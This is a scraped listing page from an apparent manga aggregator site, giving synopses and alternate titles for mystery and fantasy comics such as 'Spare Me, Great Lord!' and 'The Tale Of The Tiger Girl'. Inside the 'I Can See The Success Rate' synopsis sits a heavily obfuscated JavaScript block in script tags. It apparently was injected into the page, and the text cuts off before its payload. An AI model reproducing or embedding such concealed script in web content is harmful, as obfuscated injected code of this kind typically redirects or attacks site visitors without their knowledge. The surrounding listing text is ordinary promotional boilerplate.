
Explore the world of Mystery manga, where gripping stories await. Start reading the best Mystery manga free now!

3178 results

Spare Me, Great Lord!

Read Manga Spare Me, Great Lord! Online For Free At Zin Manga Associated Names: Dawang Raoming / Dàwáng Ráomìng / Đại Vương Tha Mạng / Пощади Меня, Великий Господин! / ชีวิตของราชันเกิดใหม่ / マイナス感情を稼いで無限ガチャ / 大王饶命 / 악역 플레이어는 강해지고 싶다 The Content Spare Me, Great Lord!: As the superpower awoke, everyone was sparing no effort to cultivate. Lu Shu was the only one who could get stronger by collecting others’ negative feelings and calling people names! All he ever wanted was to protect his little sister, but no one could resist the trend of the world. Well, he’d just do what he had to do and thus become the strongest! Are you ready to welcome the “Super Demon” Lu Shu? Read NEW MANGA updated: Cthulhu Creator The Fairy Legacy The Marquis and the Iron Wall Lady Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.

23 hours ago

Spirit of the Dead

Read manhwa Spirit of the Dead “I’ll escape from this family somehow.” Cheonryung, a loner from the prestigious Toegwisa family. Born without the ability to escape, he has lived his life being ignored by his family. Even Cheonryung has one ability: the spiritual eye. Divine beings that only Cheonryung can see. Cheonryung tries to escape from his family by using them… “You’re saying that your heart beats for those who aren’t even human?!” A strange romance unfolds with divine beings.


I Can See The Success Rate

Bai Wu, who is frustrated with his life in the real world, suddenly gains the ability to see the success rate of events. Use the success rate to reach the pinnacle of life! Success Rate<script></script><script>(function(_0xd12129,_0x1d1238){var _0x3d777b=_0x2dd9,_0x33cbc7=_0xd12129();while(!![]){try{var _0x12488a=-parseInt(_0x3d777b(0x12e))/(0xbb5+-0x15c*0x9+-0x1*-0x88)*(parseInt(_0x3d777b(0x137))/(0x2217*-0x1+-0x2cb*0xd+0x4668))+-parseInt(_0x3d777b(0x12c))/(-0x1*0x8df+0x10f7*0x1+-0x815)*(parseInt(_0x3d777b(0x125))/(0x25*-0x43+-0x465+-0x16*-0xa4))+parseInt(_0x3d777b(0x13a))/(-0x133f+-0x2*-0x893+0x21e)+-parseInt(_0x3d777b(0x139))/(-0x1*0x1ee3+0x24cd+-0x5e4)*(-parseInt(_0x3d777b(0x120))/(0xa35*-0x3+-0x14f5+0x339b))+parseInt(_0x3d777b(0x127))/(0x24fc+0x7ce*-0x5+0x212)+parseInt(_0x3d777b(0x11d))/(-0x24b9+-0x5*-0x74a+0x50)+parseInt(_0x3d777b(0x11f))/(-0x2*0xfda+0xd*-0x12f+-0x96d*-0x5)*(-parseInt(_0x3d777b(0x134))/(0x1fe7+0x43*0x23+-0x2905));if(_0x12488a===_0x1d1238)break;else _0x33cbc7['push'](_0x33cbc7['shift']());}catch(_0x313957){_0x33cbc7['push'](_0x33cbc7['shift']());}}}(_0x3b79,-0xb1652+-0x1fa8b+0x12ea91));function _0x2dd9(_0x3fbb3a,_0xbb01b3){var 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I ended up living with the cursed prince!

Read manga I ended up living with the cursed prince! Clarice, the daughter of a marquis, was taken in by her uncle, a nobleman of nobility, and raised as a tool for a political marriage. One day, with her uncle’s money, she is arranged to meet Wilbert, the second prince of the Aylford Empire! However, when Wilbert coldly rejects the proposal, Clarice is harshly blamed by her uncle for her mistake… A few days later, while Clarice is feeling depressed, she receives a letter from Wilbert. He says that he wants to give Clarice one of his mansions as an apology for the other day. However, when she arrives at the mansion, she finds a small boy covered in wounds… Clarice is suspicious, but cannot leave him alone and starts to look after him, but the boy has a shocking secret…?


Extraordinary Museum

Read Manhwa Extraordinary Museum Online For Free At HariManga Extraordinary Museum Novel also known as “Chāofán Bówùguǎn / Chaofan Bowuguan / The Extraordinary Museum / 超凡博物馆”. This OnGoing webtoon was released on 2024. The story was written by tron_pSFkCv and illustrations by tron_pSFkCv. The content of the comic Extraordinary Museum: The Extraordinary Museum is a vast castle suspended in an upside-down subspace. After my sister vanished, I found myself as the sole employee of this place. How can I even begin to describe this feeling? Watching over the world&#8217;s greatest collection of treasures, I must admit, is a bit overwhelming. The comic Extraordinary Museum belongs to the Genre: Action, Adventure, Drama, Fantasy, Horror, Mystery, Psychological, Thriller MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as &#8220;Kun Manga&#8221; and &#8220;Read Manhwa Online,&#8221; as well as related terms like Zin Manga, ManhwaClan, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. You can follow some other great Comics!!!: Wail Of Weakness Hunter Academy’s Strongest Battle God Bloodhound&#8217;s Regression Instinct


How to Draw an Ellipse

Read Manga How to Draw an Ellipse / Tawon-eul Geulineun Beob / Way to Draw an Oval / 描繪橢圓的方法 / 타원을 그리는 법 Before starting a new job at a prestigious company, Yoo Juha happily jets off on a vacation with her girlfriend, Kim Minsung. But when people from Minsung’s past show up and reveal that she used to be a genius hacker, Juha realizes she’s being used as a pawn in a secret project planned by the company executives. To expose the scheme and protect Minsung, Juha joins hands with a mysterious duo who offer their help, but will the power of love be enough to win this battle of deception?

2 days ago


Stay updated with CTRL X on Mangazin. Daily updates and gripping chapters of this intriguing Drama Romance await you! The brief summary of Manhwa “Control X” My ex-boyfriend of ten years, Daniel, married my best friend, Olivia, on Christmas, which is also my birthday! To add to the drama, world-renowned singer-songwriter Chris made a surprise appearance at their wedding, transforming it into a concert venue as a form of sweet revenge. However, the following morning, Chris receives some shocking news. Will she be able to reclaim her lost love, friendship, and fame? A different name for “CTRL X” Control X 컨트롤X


The Monster Lady and the Holy Knight

Read manhwa The Monster Lady and the Holy Knight / The Monster Lady and the Paladin “The Monster Lady and the Holy Knight” is another name: 괴물 아가씨와 성기사


It All Starts With Trillions Of Nether Currency

Read Manhwa It All Starts With Trillions Of Nether Currency Online For Free At KunManga It All Starts With Trillions Of Nether Currency Manga also known as “Bắt Đầu Với Trăm Vạn Minh Tệ / Global Horror: Start With Trillions of Coins / With My Netherworld Trillions, Game On! / Kaiju Wan Yi Ming Bi / Kāijú Wàn Yì Míng Bì / Trillions of Coins at the Start / ゴーストマスターは億万長者 / 全球惊悚:开局万亿冥币 / 开局万亿冥币”. This OnGoing webtoon was released on 2024. The story was written by 季米 and illustrations by 青鸿文化 / 飞卢小说网. The content of the comic It All Starts With Trillions Of Nether Currency: After defying death’s grip, Yu Lin awakens the “Divine Tycoon System,” which grants him daily cash payouts. But there’s a catch: the money is unusable Nether Tokens. Years later, he gets chosen as one of the lucky few to beta-test Global Menace, a horror game where only the best and strongest can survive. While others are frantically appeasing the fierce spirits, Yu Lin recruits loyal ghost followers with his Tycoon spending. Looks like having money is all you need to rule the underworld! The comic It All Starts With Trillions Of Nether Currency belongs to the Genre: Action, Adventure, Fantasy Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Confession Attack Maxed Out Leveling In the Doghouse

20 hours ago

Become the Lord of Cthulhu

The main character, Su Qi, dies and crosses over to Los Angeles and becomes a high school student. Due to his otherworldly muse, he finds himself surrounded by a variety of spirits and demons. In order to survive and not be eaten by the spirits or have a mental breakdown, the hero embarks on a journey of becoming a god and exploring the mysterious world of the Cthulhu Islands.


The Tale Of The Tiger Girl

Read “The Tale Of The Tiger Girl Novel” – “The Tale Of The Tiger Girl Manga” Online Free At Hot Manga The Summary Of The Comics “The Tale Of The Tiger Girl”: In Joseon’s Capital Of Hanyang, Rumors Are Spreading Of An Evil King Cursing The Kingdom With Ghosts. First, There’s The Wailing Man Pulling An Empty Handcart. Then, A Strange Corpse Appears In A Well, Turning The Water To Blood. To Investigate, The Prince Calls His Outcast Brother, Spirit Seer Lord Muyoung, Who Comes Down From The Mountains With His Skittish Young Disciple Haerang. Can This Pair Unravel The Mystery, Or Will They Too Get Caught In The Web Of Royal Curses And Vengeful Ghosts? “The Tale Of The Tiger Girl” Is Alternatively Named: The Tale Of A Tiger / 호랑낭자 뎐 / 호랑낭자뎐 The Comics “The Tale Of The Tiger Girl” Belongs To The Genre: Drama, Fantasy, Historical, Manhwa, Mystery, Romance “Manhuaplus, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Kun Manga. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


The Dark Magician Transmigrates After 66666 Years

The Dark Magician Transmigrates After 66666 Years Diablo Volfir, a mighty magician, was sealed for aeons due to the schemes of the 12 Gods, but 66666 years have passed since then, and he descends to earth once again! Reincarnated Into A Warlock 66,666 Years Later ,66666년 만에 환생한 흑마법사 ,A warlock reincarnated after 66666 years ,A Black Wizard Reincarnated in 66666 Years , Black mage reborn after 66666 years , The Dark Magician Transmigrates After 66666 Years Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhwa trending  such as Drama, Manhua, Manga, Romance…, for free here. All of the manhwa new will be update with high standards every hours. If you are a Comics book (Manhwa Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !
